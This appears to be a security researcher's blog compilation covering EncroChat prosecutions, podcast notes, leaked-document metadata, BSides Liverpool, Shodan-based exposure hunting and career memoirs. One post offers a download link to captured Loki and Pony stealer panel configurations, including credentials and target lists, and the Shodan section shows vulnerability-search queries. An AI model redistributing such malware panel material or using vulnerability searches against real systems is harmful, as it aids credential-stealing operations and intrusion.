Operation Venetic v IPT

I’ve been quietly keeping up to date on the recent IPT trial on Operation Venetic . To find not only has some of the footage been posted to Twitter

https://archive.ph/wip/kC7Ir Archived Tweet

I was also interested to find that this interesting note appeared.

Matthew Ryder KC told the court that the NCA had decided that it wanted a Targeted Equipment Interference (TEI) warrant - the only warrant that would allow messages and images intercepted from EncroChat to be used as evidence in court.

and even more curiouser.

An analysis of the Investigatory Powers Act showed that the correct warrant for the EncroChat operation, would have been a Targeted Intercept (TI) warrant, Ryder told the court, which would not allow messages harvested from EncroChat to be used as evidence.

However, the most interesting news seems to be the first publicly known method of exploitation that was actually used.

Csoka said that one known vulnerability with EncroChat, which used the Signal protocol, was that the random number generator, used for encryption, could be replaced by an attacker.

This doesn’t seem entirely accurate and may be used in layman’s terms for the reader, i do recall a well known audit was performed before the takedown occurred and i believe included a TLS downgrade attack was feasible given the TLS version that the Encrochat network used at the time, however i cannot find this, please link me to it if you remember it and can secure the actual research. This may well be what Csoka is referring to as interpreted by the reporter.

The implications would indeed be quite big if found in the favour of those currently seeking to challenge.

Encrochat

Encrochat

Encrochat

Welcome to Encrochat

The errors that led to arrests of criminals using Encrochat

The following is a none exhaustive list of various (and in some cases comical cases of failing basic security measures)

Josephcox wrote an exceptional article on how various Police agencies 'cracked' the network. The French Gendarmerie’s Centre for Combating Digital Crime (C3N) gained access to Encrochat’s servers, housed at the French data centre provider OVH in Roubaix in April 2020.

https://www.vice.com/en/article/3aza95/how-police-took-over-encrochat-hacked

The French, working with the Dutch police and the UK’s NCA, were able to collect 'encrypted' messages from the Encrochat devices.

More than 32k users in 122 countries were exploited, regardless of whether the users were criminal or not, the Berlin court found.

Specialists at C3N collected the messages and passed them on to Europol, which packaged them up according to country of origin and shared them with police forces in Germany, the UK and other countries. This has led to a number of legal challenges to decide the legality of the case(s) GSTaBerlin

Observations

The following includes evidence collected from various social networks in which the seemingly arrested, and in some cases imprisoned are convinced the 'cracked' interception and subsequent takedown is 'illegal', and in the near future will be heard by a court in France to determine the legality of it parts of the case. A case heard in Berlin struck dow.

The Fails

There is an golden cited piece of research by @the_grugq

https://grugq.tumblr.com/post/60463307186/rules-of-clandestine-operation

This piece stresses a number of areas of fundamental areas of tradecraft expertise to master.

Not like this, an i swear Big Poppa (https://www.dailyrecord.co.uk/news/scottish-news/scots-criminal-gangs-face-carnage-25844782) was the first 'victim' i saw. Ironic.

BIG POPPA

Great t-shirt.

Toffeeforce

Stewart was arrested after he posted the photo on the encrypted messaging service EncroChat, via his handle “Toffeeforce.” Unbeknownst to him, the service had been cracked by police in Europe. From that, his palm and fingerprints were analyzed and police had their man

Carrothorn'/'Maidenbear', 'Mistersmallhead', 'Festiveape', and 'Shaggyfarmer

Key to the investigation was an image recovered of Atkinson drinking beer in his garden during the Covid lockdown.

It was sent from his device to a leading member of another drugs gang, which prompting confirmation that he was behind the nicknames and heading the drug conspiracy.

Nevermind, eh.

Alex Male

He was detained at Lisbon Airportafter arriving on a flight from Turkey where he had been refused entry, according to the National Crime Agency (NCA), which added Male to its most wanted appeal in January.

Lemonisland/Activegamer

Bryan Stephen Heffey, was found to be using the EncroChat handles 'Activegamer' and 'Lemonisland' to supply large quantities of heroin, cocaine and cannabis. Detectives found evidence of his drug dealing on his handles, with pictures he shared with other users showing blocks of cocaine and an estimated £16,000 of cash.

Fatso

Sources have confirmed that Mitchell used the alias 'Anthony Swanson' while living out of a middle-class address on Pollard Lane, Bradford in Yorkshire.

This was the same alias used by the former Gilligan gang member when he fled Ireland following the murder of Veronica Guerin.

According to sources, Mitchell also used the same bogus date of birth used previously - May 14, 1960 - for his 'Swanson' identity.

SneakySystem/Wackysilver

George Marsh was identified after sharing an image on his Encro device of his own hand holding a bag of drugs, from which his fingerprints were analysed.

Johnny Weed/DiorPaw

The court heard Digweed, of Harlech Road in Crosby, sent messages to other dealers referencing his kids and birthday parties he was planning for them, helping police to trace him when the Encrochat system was hacked. He also sent other messages allowing them to be sure of his identity. One image sent to him by another criminal showed a block of cannabis labelled “Johnny Weed.”

His response was: “HaHaHaHa lad who’s done that, its only missing dig out the name. My name is Johnny Digweed init.” Digweed was arrested in March 2021 and convicted in December of seven counts of conspiracy to supply drugs in addition to one count of money laundering.

TrustedBat

Ryan's operation came crashing down after he posed for a selfie. But his secret identity was exposed when police linked that account to a photo the 23-year-old had taken of himself and sent to an associate.

Nice.

Nice.

Headfluffy

He was unveiled as the user of an account with the handle Headfluffy because of one simple mistake - when arranging a deal with a wholesaler he actually gave the address of his Foxdene home in Ellesmere Port as a drop off point for the drugs he was buying.

Steven Strachan/FastSilver

The 49-year-old was identified as FastSilver partly because of the photos he sent to other users of his extensively renovated home on School Lane in Bidston. This included an image of him lazing in his yard, which had distinctive paving that allowed police to match it to the picture sent by the account.

Lovely paving tbh

AtomicMantis/Silky/James Duckworth

Prosecutors said notes on his phone suggested Duckworth was responsible for paying out more than £4m to associates on just one day last year.

Meanwhile photos showed £385,000 of cash - vacuum sealed for delivery - laid out in front of the fireplace of his family's home, along with kilos of Class A drugs opened for inspection. A password to his device combined his name with that of his partner and children. He told contacts his home was recognisable because of the white Jaguar outside.

Remember, https://www.youtube.com/watch?v=S8GPTvq1m-w + https://www.slideshare.net/grugq/opsec-for-hackers

Wise words.

“It is only very very stupid people who think the law is stupid. And avoid like the plague, loud attention seeking wannabe gangsters who are in it for the glory, to be a face, to be a name. They don't mean to fuck up. They just do.

https://youtu.be/c8MGBn3KawM?t=207

27/09/21 Episode 04 - @tcstvns

A huge thank you to Dr. Tim Stevens from KCL for coming to talk about global security & Mafia arrests. We also cover some discussion on China & Russia as threats to security & democratic norms in the past decade

Show Notes:

  • Cyber Skirmish: https://www.kcl.ac.uk/events/cyber-strategy-the-evolution-of-cyber-power-and-coercion

  • Old wine in New Bottles: https://journals.sagepub.com/doi/10.1177/a017405

  • EUROPOL operation: https://www.europol.europa.eu/newsroom/news/106-arrested-in-sting-against-online-fraudsters

  • CYBER THREATS & LANDSCAPE OF 2030: https://ccdcoe.org/uploads/2020/12/Cyber-Threats-and-NATO-2030_Horizon-Scanning-and-Analysis.pdf

EPISODE 04 - Dr. Tim Stevens

31/08/21 Episode 03 - @elisethoma5

A very special episode of the Cyber Digest featuring Elise Thomas, an OSINT Analyst at ISD, with a background in researching state-linked information operations, disinformation, conspiracy theories and the online dynamics of political movements.

This episode includes discussions on information warfare, the goals of disinformation warfare, protests and of course CYBER.


Screenshot 2021-08-30 at 11.23.17 am.png

Notes:

  • Q - Into The Storm: https://www.imdb.com/title/tt14215442/

  • Elise Thomas: https://www.isdglobal.org/isd_team/elise-thomas/

  • Operation_INFEKTION: https://en.wikipedia.org/wiki/Operation_INFEKTION

  • Sekondary Infektion: https://secondaryinfektion.org/

  • Active Measures by Thomas Rid: https://www.londonreviewbookshop.co.uk/stock/active-measures-the-secret-history-of-disinformation-and-political-warfare-thomas-rid

  • The Plot to Hack America: How Putins Cyberspies and WikiLeaks Tried to Steal the 2016 Election https://www.amazon.co.uk/Plot-Hack-America-Cyberspies-WikiLeaks

Cyber Digest EP3 - Elise Thomas

28/04/21 Episode 01 - John Hultquist

My thanks to my pal John for agreeing to join the very first episode of the Podcast, John joins to talk about the recent Ghostwriter activity from FireEye amongst other news.

Screenshot 2021-04-28 at 4.36.26 pm.png
EP1: John Hultquist


Show Notes:

  • Ghostwriter: https://www.fireeye.com/blog/threat-research/2021/04/espionage-group-unc1151-likely-conducts-ghostwriter-influence-activity.html

  • ProxyLogon: https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html

  • Solarwinds: https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

  • Ref: Iran and the Soft War for Internet Dominance: https://iranthreats.github.io/us-16-Guarnieri-Anderson-Iran-And-The-Soft-War-For-Internet-Dominance-presentation.pdf





Secondary Infektion - Welcome to Westminster

In early December 2019, Reddit identified what they refer to as 'coordinated behavior', FaceBook have a great primer on it here

Whilst the document content themselves where not very interesting, the 'secondary infektion', a term explained here was a well worn technique developed to manipulate public opinion/emotion. I took a look at the documents, and identified the following:

  • Document metadata which points to a potential day and time of a meeting where the notes took place.

  • Document Metadata that points to EDT timezone

The UK was about to vote in a general election which would likely form a strong opinion on Brexit, this made for a good target for the 'secondary infektion'. Firstly, the documents are marked 'OFFICIAL - SENSITIVE', so i won't be linking to them. However the document metadata is curious enough to warrant further analysis.

The zip file contain 6 PDF files of which 4 contained Author data:

  • Schneider Rebecca (Trade);Anna-Marie Lee

  • Schneider Rebecca (Trade)

  • Anna-Marie Lee

  • Oliver Griffiths

A cursory Google of the following names identifies them as appropriate professionals associated with Trade and Government status.

All the documents have a modified time stamp of:

  • Mon 29 Jul 2019 12∶35∶58 PM EDT

  • Mon 29 Jul 2019 12∶40∶52 PM EDT

  • Mon 29 Jul 2019 12∶40∶02 PM EDT

  • Mon 29 Jul 2019 12∶36∶42 PM EDT

  • Mon 29 Jul 2019 12∶36∶54 PM EDT

  • Mon 29 Jul 2019 12∶39∶06 PM EDT

EDT stands for EDT, which is 4 hrs behind UTC, which would fall (largely) on the US East Coast.

 https://www.timeanddate.com/time/zones/edt

July 29th UK News was largly dominated by Brexit headlines https://www.expressandstar.com/news/uk-news/2019/07/29/what-the-papers-say-july-29/ which would suit the agenda for 'secondary infektion'. What is more interesting is the date of the created/modified timestamps.

  • Created: Thu 18 Jul 2019 10:20:02 AM EDT Modified: Thu 18 Jul 2019 10:20:02 AM EDT

  • Created: Thu 18 Jul 2019 10:17:26 AM EDT Modified: Thu 18 Jul 2019 10:17:26 AM EDT

  • Created: Thu 18 Jul 2019 10:18:39 AM EDT Modified: Thu 18 Jul 2019 10:18:39 AM EDT

  • Created: Thu 18 Jul 2019 10:17:49 AM EDT Modified: Thu 18 Jul 2019 10:17:49 AM EDT

  • Created: Thu 18 Jul 2019 10:30:25 AM EDT Modified: Thu 18 Jul 2019 10:30:25 AM EDT

  • Created: Thu 18 Jul 2019 10:18:08 AM EDT Modified: Thu 18 Jul 2019 10:18:08 AM EDT

Nothing too strange about this, but the date was interesting given that UK Parliament was in recess, i wondered where and how these documents had been created by Government officials if they had been in recess.

These dates would correlate somewhat curiously with the following meeting(s) in the Palace of Westminster:

http://services.parliament.uk/Calendar/Lords/MainChamber/2019/7/29/week.html#!/Calendar/Lords/SelectCommittee/2019/7/18/events.html

A meeting titled:

EU External Affairs Sub-Committee
Subject: Private Meeting
Location: Room 1, Palace of Westminster

10am start? - Curious indeed.

Some further anomalies exist in the metadata in that the Format differences between documents which is to be expected given the multiple authors and last modified stamps:

  • PDF-1.7 (Initial Release 2006)

  • PDF-1.5 (Initial Release 2003)

I don't fully understand why there are differences between some of the document Format versions, according to the specification there is no discernible differences as far as i can tell( i am open to being told otherwise)

In summary, the documents leaked have could have been modified during a potential meeting in Westminster by a device/laptop which had a EDT timezone, this is purely speculative given the relative ease in which this kind of metadata can be altered at will to suit the agenda but is certainly not beyond the realms of truth.

BSides Liverpool

It was 3 years ago or so i had the itch to put together a Bsides Event in my home town, i’d worked in this industry for about 20 years now, i’d make a really good set of relationships from a large number of companies.

I wanted to give something back, that was an event in the middle of my city. I arranged a call with incredible Jack Daniel and he spoke to me for about an hour on his porch swatting away various insects in the summer heat. He carefully explained to me, someone with no event organizing experience how to bring together sponsors, attendees, speakers and everything else in between

Then, BSides Liverpool was born.

Screenshot-2019-01-30-22.13.48.png



In late 2016, i arranged with my then team mates at Fujitsu how i would plan the event. We’d have various tracks on security including a rookie track. I’ve found i get an incredible amount of enjoyment out of mentoring, so i was excited at this prospect.

Now, it was originally planned for the Summer of 2017, then 2018. You get the picture. Late in 2018 i bit the bullet and registered a twitter account with the name of bsideslivrpool, as the original ‘bsidesliverpool’ was already taken.

This was a huge step for me, famously procrastinating over select details. I received a DM a few weeks later asking who was behind the account (It was Jenny Radcliffe!), having already reached out to a few people. i couldn’t think of anyone better than Jenny Radcliffe. I’d known Jen for a few years having been bewitched by her incredible social skills, someone who can put a complete stranger at ease and get anyone onside in moments is an amazing skill, it’s no wonder she is called the People Hacker. I had assembled an amazing team already.

Myself & Jen quickly realised that someone like ourselves with all the Scouse determination was likely not going to be able to orchestrate an event at this scale! However, we both knew someone who did! Step forward Mr Stuart Coulson. Stu, my friend, my mentor is someone who i’ve grown to respect every single day with a level of integrity unmatched in this industry, he was at the very first public talk i ever gave in Blackpool and gave me some incredible feedback.

The team was complete!

The team was complete!

We both agreed he would be a perfect fit on the team, befitting of a inaugural event from someone who did this sort of planning for a living. I was proud to welcome to Stuart on board as a co founder and organiser.

One final person to join the organising committee was the wizard Antisocial Engineer, who can do things with a keyboard that i wish i could!

The event gathered some incredible sponsors, we hit our goal very quickly! Thanks to the teams efforts we got the swag, the venue, the speakers, the attendees tickets and helper squad sorted.

The above two sentences don’t do justice to the large number of Skype calls, the telephone calls, the Slack messages, WhatsApp conversations we covered over 6 months of consistent badgering for sponsors, CFP and other stuff. I can’t do it justice here it’s just not possible.

The event arrived, June 29th which was comically the hottest day of the year, we put the event up in the Maritime Museum, made solely from bricks and mortar and what felt like zero air con. I had badgered/asked some incredible researchers to come and speak at the event, they delivered — Thank you all.

The event went without issue, or so i thought.

There was a tweet, there is always a Tweet.

A now deleted tweet pointed out the panel was made up of 4 white males, one being my friend Stuart Coulson. Another containing two long standing members of the security community who had been drafted in at literally days notice to fill in for a panel which was beset with tragedy. The final member was a relative rookie, talking about how his journey into information security has been (18 months iirc)

You can read the “apology” from the account here I won’t belabour the response already given from our team which you can read here

Infosec Drama’o’clock

Our team put an untold number of hours into developing this conference, and when there is negative, or unconstructive feedback, i, personally take this extremely personal. I come from a very poor background, and i am disabled, and understand somewhat how difficult and painful this industry can be as a minority, to have someone pass judgment on a single photo which in the cold light of day was a all white male panel, shows us the event in a poor light. The ‘drama’ that gets passed around is the result of systemic problem Twitter has in everyone has an echo chamber and you usually end up arguing with everybody without a response to the original problem, this was a perfect example of that.

We received incredible support both in the Twitter thread and verbally, i would like to thank you ALL for your support for the event.

I took this personally, as i often to i felt responsible. As someone who thinks of themselves as someone with the ability to manage the expectations of many whilst balancing the nuanced realistic expectations. i saw Twitter in the most disgusting way i’d ever seen. I saw abuse directed at my teammates, i saw a racial slur used to describe the panel. I hated it all, i absolutely hated it — all because of a photograph.

I’ve spoken to the team, and i will no longer be an ‘organiser’ of BSides Liverpool, I will be around to support my friends 100% but the team needs someone who is mentally stronger than me, who isn’t as emotionally attached to things as i am.

There is nothing wrong with being passionate about something, but when that passion becomes pain, it’s time to take a look outside. This may all seem a bit dramatic and it probably is, i just felt the need to respond in my own way.

Thank you to Jen, Stu, Rich, Jack, Lee.

Threat Hunting for Free¹

There is no network perimeter anymore!

¹ Free in cost only measured by time and effort.

Well, there is. 

Whether we like it or not, and defending them is hard, visibility is even harder. Risk management, a risk register, a vulnerability acceptance posture. Yeah, you usually hear about this after a security incident. There are some things you can do do fortify your defences, and they don't require a business case to implement, they don't need a project manager, and they likely cost less then a coffee.


Adversaries, attackers, breaches, hackers, all words familiar words in todays landscape, but its not as bad as it would appear, you can do a lot for not a lot of your time and effort, in this blog i will show two services that you can automate and remove a level of uncertaintly from your blindspots.

SHODAN

Firstly, there is 100 quality blog posts on defending your network using Shodan, and i will not try to do better than them, using my own experience and methods i'll share some ways to gain insights into how attackers use shodan to leverage a entry point, or a vulnerability.

So firstly, you'll need to get a Shodan account, there are super cheap, and usually around Black Friday do a lifetime account. <https://account.shodan.io/> once you've gotten started here, familiarise yourself with the CLI interface and install the tools required using 

$pip install shodan

Then

shodan init API_KEY_HERE

once you're done installing hit the -help switch to get a list of help commands, and <https://shodan.readthedocs.org/> and critically, the banner specification https://developer.shodan.io/api/banner-specification

So, in our case we need to identify a subnet to monitor, John has perfectly described how to do this here  but this post goes a little deeper.

200.gif

So, unless you're fortunate enough to never have heard of SMB or Ransomware, then you are likely going to be very bored by this set of investigative steps.
 
We're going to use a well known range of addresses to identify SMB exposure, and then run to someone internally and have a long chat about Ransomware insurance or Microsoft upgrade paths, whatever is cheapest (YMMV)

 So, we have our range of addresses from Azure. We're going to use this list from here <https://www.microsoft.com/en-gb/download/details.aspx?id=41653>

We are going to use 13.67.128.0/20 from the Microsoft Azure datacenter list, so given this is a public address lets go

First we go with:

shodan count net:13.67.128.0/20 1375

This will output a total number of devices shodan can see, not very helpful so lets chop it up a little more. 

Cool, so lets say i was an attacker i'd be interested in the path of least resistance right? SMB, RDP, etc, fire up my metasploit, and then watch as it exploits it all for me.

So lets check out if 445, or 3389 are open in this range. We need to extend the results list a little to be able to see.(AFAIK Shodan defaults 300 results)

shodan stats --facets port:500 net:13.67.128.0/20

will return a list of the top 500 ports and guess what

2.png

 

Of course the ports being open doesn't immediately mean pwnage, and nor should it. Multifactor authentication is available for Azure (Not free) but for admins it is, and 445 needs to be vulnerable and of course you can use other stuff like Authy and for o365 there is guidance here. You can check this out using the following command

shodan count port:445 net:13.67.128.0/2 SMB vuln:MS17-010

In my tests, the results was ZERO, so thats good news. So that is a very small step on protecting the perimeter for less than the price of a coffee, and about the same time as it would take to drink it.

Here Phishy, phishy...

Next, is the excellent tool from @x0rz here

I've been using my own version of this tool, customised to use some more personally interesting topics such as banking, and US Political lures. You can do the same for your own company as i've done in the past with varying success, in our case we're using Microsoft. So we can just comment out all of the junk and put in the following (I recommend combining it with DNStwist) then we have a long list of likely typo domains, and some which are being used in the certificate transparency generation list.

https://dnstwister.report/search/6d6963726f736f66742e636f6d gives us a lot so if we use these in conjunction with our list of suspicious.py we may get lucky, this can help us lower the risk of users being phished, or landing pages used to harvest credentials as observed recently by Microsoft here https://blogs.microsoft.com/on-the-issues/2018/08/20/we-are-taking-new-steps-against-broadening-threats-to-democracy/

Some results here

https://asciinema.org/a/gO6uDVvninfOuIdsnAjePX5vk

Happy Hunting

 

Journey into Security - Part 2

I was fortunate enough to work with some incredibly talented people in my journey into security, who helped me understand difficult concepts, some of which I am still learning.

  • Cryptography
  • Windows Internals

Two skills I believe are absolutely key to working in security because no matter where you go inside security you'll need an intimate understanding of both, so that's where i decided to start, i was working on user virtualistion software, this is, in essence, a reflection of roaming profiles, and using some magic to ensure a consistent user experience across all platforms, including physical and virtual desktops, not limited to stuff like published desktops from Citrix, Vmware & Microsoft. 

I furthered my understanding by buying a couple of books..

Internals

Internals

Learn that sh*t

I probably refer to at least one of these books once a week for a function or the parameter of a service, partially because I have a terrible memory. In that role, I was automating some of the work I was doing and came across tools like psexec, sysmon and the rest of the toolkit. So like any analyst, I automated some of my testings and begun to explore the rest of the tools.

Process Monitor & Explorer - thank you, Mark and Bruce!

I used this to troubleshoot registry problems, identify login issues and generally understand what was happening during login. A low-level way of examining & testing bugs that I was trying to non-programmatically troubleshoot.  

Little did know that during the troubleshooting I would identify malware infection in my own lab, I was able to track this down using some of the inbuilt filters which captured the process running when I visited a certain site. This was the moment I knew I was interested in malware. I didn't have any idea what it was capable of but I knew how to identify it and how to remove it.

Moving on

I was 'content' at the role I just mentioned, and had a passing interest in security, but became more and more fascinated by some of the articles being published online I attempted a few ctf's and failed miserably, I didn't know what I was doing, and although I was curious - I took defeat very badly, and personally. I was persistent - I started visiting some forums and asking questions, i joined kernelmode.info and starting reading the content, copying and learning.  I also learnt of Lenny Zeltser as part of my research and found this which was at version 5 i think when i discovered it, and it included cheat sheets on taking apart malware! I was saved, i had step by step guides on using the tools I had watched, and learned a lot (Thank you, Lenny!)

I had a keen interest in attending FOR610 and joked ' i would give my first born to go', the reason was that it was super expensive. I learnt an awful lot on this course and still refer to the course materials to this day, both Lenny and his colleagues are incredibly helpful, approachable and clearly enjoy what they do. 

I've spent a few years at Fujitsu now and learnt more than I can possibly write down here, but some of the highlights included working alongside great people, and being fortunate enough to work at the NCSC as part of the previous Fusion Cell, and now known as Industry 100. Representing Fujitsu on a number of occasions all over the world, and attending Blackhat & DEFCON. Speaking at conferences on behalf of my employer is something i am incredibly proud to do, and something which impresses my daughter even more - which is all that matters.

Giving back

I have the opportunity to share what I know and have learnt. This kind of opportunity is something that gives me an incredible feeling of gratitude knowing I am assisting those who need to learn, like me I forever refer to myself as a 'noob', because when you realise you know everything, you realise you know nothing. The opportunity in question is working alongside some talented people at CTU in Prague on a project called CivilSphere working remotely to protect those vulnerable from being targeted. I have always been impressed by the work done by the likes of CitizenLab and was inspired to try and be part of this protection network. I am very thankful to Sebas for this opportunity, and all the talented people at CivilSphere.

Next Steps

I will be leaving Fujitsu in a few weeks, to start a new role at Proofpoint. I look forward to learning more interesting concepts, and being a noob all over again.

 

 

Journey into Security - Part 1

I consider myself a noob, forever asking simple questions. Just how does DNS work? WTF is a floating pointer. A lot of these questions borne out of curiosity, and a few people said they would be interested in hearing how I got into Security. So i decided to write it down, it feels very much ' LOOK AT ME HOW COOL I AM ' and self indulgent writing this, but that couldn't be further from the truth, i hate talking, or writing about myself but in light of the current state of security, and being considered a mentor to a few people and working with extremely bright people i felt obliged.

I have loved computers ever since i could remember, i won't bore you to tears with my first computer because its likely the same as most people my age, but here is a photo of it. 

BBC_Micro_Front_Restored.jpg

2Mhz CPU

A shared computer at home, no games.

Fast forward a very long time to my teenage years and I was asked to help out at a family friends place of work, they had high-speed scanning of documents(invoices, purchase orders etc), I automated parts of this job and put a few people out of work (sorry) With this came the management of the storage of the scanned items, which came with the ability to identify secure methods of storage. At this point, an online presence was just emerging in terms of retail so it wasn't really a consideration that at some point payments would need to be taken online and managed in an office and placed internally. So my curiosity led me to a device known as a domain controller (Windows 2003 SBS) which contained the following 

  1. DHCP
  2. DNS
  3. WINS

WTF was this? and what did they all mean, well i needed to understand what I was working with some I quickly spent a lot of time on  place called TechNet, before Microsoft released the useless bots to answer questions, it was a thriving community with a lot of answers and help, I learned the basics of network management here understanding what a subnet was, and why it was important to track who was using what range, and I why. ( Think credit card processing )

Now I realized at the time a lot of letters started to appear on the signatures of my peers ( MCSE, CompTIA) I thought, what was this? a quick Yahoo!( yes, yahoo ) a search showed me that Microsoft was giving certifications to people who took tests and with that came the letters! Cool, I thought, i was in my 20's and had not sat a test since school, and i did not go to University so it was natural to try and test myself. That particular employer did not give me any training so i had to leave and ended up at one job (i have missed out two roles here that do not have any impact on my journey into security ) - i ended up at a communications company, dealing with MPLS, leased lines, dedicated fibre links etc. Basically, the stuff that powers the internet & telephony.

My first job in this role was to 'map the network' - wait, what? I didn't have the slightest idea where to begin, routers? Switches? i was a Microsoft specialist and had sat away from networking because of dedicated resources, i had the opportunity to understand these things and did so quickly, i had a vague idea of the topology and was able to Visio a map in about 14 days. This was as much a test for me as it was for the company, we had:

  1. WAN Router(s) exposed by default auth
  2. Hardcoded credentials in reception for wifi
  3. Gold Images that had no updates applied for over 10 months

So at this point, i had access to an Active Directory with approx 3,00 users and mobile devices, computers which ran XP and a Windows 7 deployment upcoming. This was my job to manage, design and deploy. I was very scared. computers where something i used not something i knew what to make use of!

I was extremely fortunate enough to attend a Microsoft Course which was titled ' Fast track to managing and maintaining an active directory domain 2003,' , this course 5 days away from my home in a strange city taught me so much, i had 10hrs a day exposed to an active directory domain that i build and could break and rebuild without the fear of a P45 arriving, i got further into some concepts that i had come across ( DHCP, DNS, WINS) and some other more interesting concepts which iginited my interest further.

Security 

I had long been in awe of security specialists, I had only minor interaction with these superheroes, they usually worked in a Firewall team, or some other amazing sounding team - and would only appear when things where bad, so that was my interest, what DID these people do?  Well i quickly discovered that a set of ACLS on a firewall was not as interesting to me as managing a forest of objects for thousands of people and understood securing active directory was much more interesting, i started to dig into Active Directory and trying to understand further i quickly learned about a few things

  1. Active Directory is hard
  2. Active Directory is hard
  3. Active Directory is hard

Now the grizzled amongst will say it's not, I completely disagree - the entire concept of Active directory has been badly managed, and whilst its now an entire attack surface and has brought to light some of the most incredible attack methods, there is very little in the blue team area of protecting Microsoft Active Directories.

So. after dedicating a few years to becoming a specialist* in Active Directory security, i moved on. A role in the legal marketplace. I was protecting the assets of solicitors, a domain unlike any other i've ever worked in before. A difficult but challenging role because of the reliance of physical documentation for legal professionals restricted much of what is digitised. 

Exams, Exams.

Screen Shot 2018-03-04 at 2.13.43 pm.png

I was very boring for a few years, taking exams every few months.

 

One day, I arrived for work and was told i would be sent on an ' intervention', this in the UK refers to a concept when a legal practice is in distress a member of the 'SRA' will intervene and take over, this included all electronic items. I was basically an IT bailiff.  

I had managed antivirus solutions because nobody else would (Who can blame them?) but quickly realised what a GOLDMINE of information was being identified, it was a pretty default policy ( block, allow, delete, quaratine ) the little friction it was generating was not worth the cost of renewals, so I changed it an applied it to different machines, using different policies depending on location and level of practise seniority, I didn't want to get the sack because a partner of the practice couldn't plug in the USB device he also used at home. 

I was identified as a potential for the intervention ' because Bryan knows security '. Did i? Not really, but I did know how dangerous office macros where and why IE6 really shouldn't be used. Let's go - anyway, an 'encrypted database' was being used to store all client data and we needed it to be able to 'take on the cases'. the 'encrypted database' was a Microsoft Access database, it was trivial to crack, made even easier by the fact the password was stored in passwords.txt in the same directory.

Anyway, I was hailed as a savior and even though no laws where broken, that resulted in a lot of money being earnt, and my value rising too (all because of a password policy?)

So i was given access to be able deploy my OWN antivirus policies as a result of some good work around ' finding passwords in directories called passwords', i had shown interest so there we go.

I deployed extremely restrictive policies to execs, so much they complained, i updated device controls to prevent data loss via mobile phones, and usb sticks, and identified the malware as a result of this and thought ' well this is cool', im using something someone hates to hear about to find all this bad stuff, who wouldn't be interested in this?!' Turns out it was only me, and this is where my security passion was really born.

Hello, Pentester 

Fast forward a few months and i received an alert from my very restrictive policy alerting me to someone running passwordump.exe on my domain controller, but not only did i lay a very small egg in my pants but i was worried because the domain controller was a honeypot. I had deployed a few domain controllers in a sense that they advertised the services to a would be a attacker but contained no actual resources. A modern day RODC but RODC was a thing. Turns out we had a 'black box' pen test in which the manager was aware of, i quickly identified the pen tester in a room he had 'walked into' and plugged into a telephone port, identified the DHCP range as being broadcast from my 'domain controller' and thats all - i just named the server as DOMAIN CONTROLLER and no ntds.dit was enough to attract the attention of his toolkit. The server was only running DHCP.

Anyway i tried to take control of his session, and this image made it into the eventual pen test report as a way of positive feedback on deception.

 

LOL no

LOL no

What does this button do?

I moved on from that role, as my passion for security grew I moved to a company that was responsible for user virtualization, I learned more here about user profiles than i can ever forget, the stages of authentication involved in a login, the handshake and crucially the concepts around Kerberos and NTLM - had a core understanding of authentication and the reliance on trust for authentication, and with this came a more curious minded approach, I worked with extremely talented developers and students who where driven by curiousity from an academic sense, I was purely trying to learn and stop being a noob. I was in a QA team, a bug hunter! sadly, the only bugs that drew attention were not ' this button works', but that the storing of plain text passwords in SQLite databases kinda bugs.  Along with the realisation that I should be documenting every single thing I ever needed to know in a physical form so I bought Moleskines

Lots of them.

IMG_2231.jpg

Notes

Write that sh*t down

As I've written here I have realised a second part will be much more interesting than one long boring post. It will include more of the recent stuff, a failed CISSP study attempt,  how I identified bugs before bug bounties were cool & some malware stuff.

Panel party - Loki, Pony.

Hunting via Hybrid Analysis I identified persistent offender(s) storing content on a panel. I kept my eye on it for a while, and when it was busy enough, I managed to get the entire server configuration panels.

Wallet stealer
  1. Loki admin
  2. Pony admin

Usernames, passwords for MySQL and database configurations, over 100 lists of target applications, BTC wallets, FTP clients, browsers, games

The most interesting thing for was that Loki has a POS module.

Here is the contents, ping me it become unavailable

  • https://drive.google.com/open?id=1l3vcGBnbknVhu-Fe6KZ5XB9LLEYx8Pua
  • SHASUM: 591cc7fe34d5cd76c7bd8be4ee9d94741e293946

Have fun.

Russia v Ukraine : A primer for the uninitiated

Russian intervention in the Ukraine, be it military or 'cyber', historically has been something of a strategic playground, whilst other attacks observed are more 'noisy' - or disruptive, the ongoing incidents which can be, and will be attributed to Russia. If like me, you're a scholar at the aspects of cyber incidents particularly when it comes to Russia v Ukraine which experts will quickly identify and theorize are the work of the shadowy Russian bear(s).

My own learning has focused on 'why', and I've digested  and recommended the following

  1. The 'ultimate' guide, in my humble opinion, is here Russia v Ukraine  Kenneth Greers
  2.  APT28 or depending on the vendor
    Pawn Storm,
    Sofacy Group,
    Sednit,
    STRONTIUM,
    Tsar Team,
    Threat Group-4127,
    Grizzly Steppe (when combined with Cozy Bear) The important part to note here is that APT28 is widely believed to be GRU, and GRU are explained in detail here 
  3. APT29 or Cozy Bear, again depending on the vendor may be called any of the  following Office Monkeys, 
    CozyCar, 
    The Dukes, 
    CozyDuke, 
    Grizzly Steppe (when combined with Fancy Bear)

This is the best infographic I have seen explained the process of APT28/29 activity.

APT28_APT29_Techniques_-_Spearphising.png

 

There are a breathless number of analysts capable of dissecting the incidents that occur within the Ukraine borders and often more are bullet quotes seeking to encourage fear, uncertainty and doubt, AKA FUD. My experience of working with some extremely talented analysts both in the Government and at F500 who actively avoid headline-grabbing and offer comments by way of research and analysis. Robert M.Lee explicitly called out this type of behaviour and asked 'stick to the facts'.

The concept of 'hackers' knocking out power in a country is one which evokes a large number of reactions, I look to people like Robert M. Lee for measured and sensible analysis, as should you - if your number one source for information is mainstream media, you won't get insights, you'll get clickbait.

With that in mind, the elephant in the room is the 2016 US. The election, something which those not directly involved in intelligence, be it cyber or policy will still be closely unpicking. I recommend the following content for insights how the 'fake news' - and i still can't say that phrase with a straight face, helped undermine the political agenda.

Some of these are incredibly long-winded and contain quite a lot of personal sentiment, but if you can decipher that and understand the underlying themes in that disinformation played a significant part in the U.S Election you'll understand what a weapon social media has become and why, as a 'Cyber Threat' analyst, you'll be required to place extremely close attention to it.

Cambridge Analytica  

https://medium.com/join-scout/the-rise-of-the-weaponized-ai-propaganda-machine-86dac61668b

tl:dr - big data manipulated everyone.

The Plot to Hack America by Malcom Nance

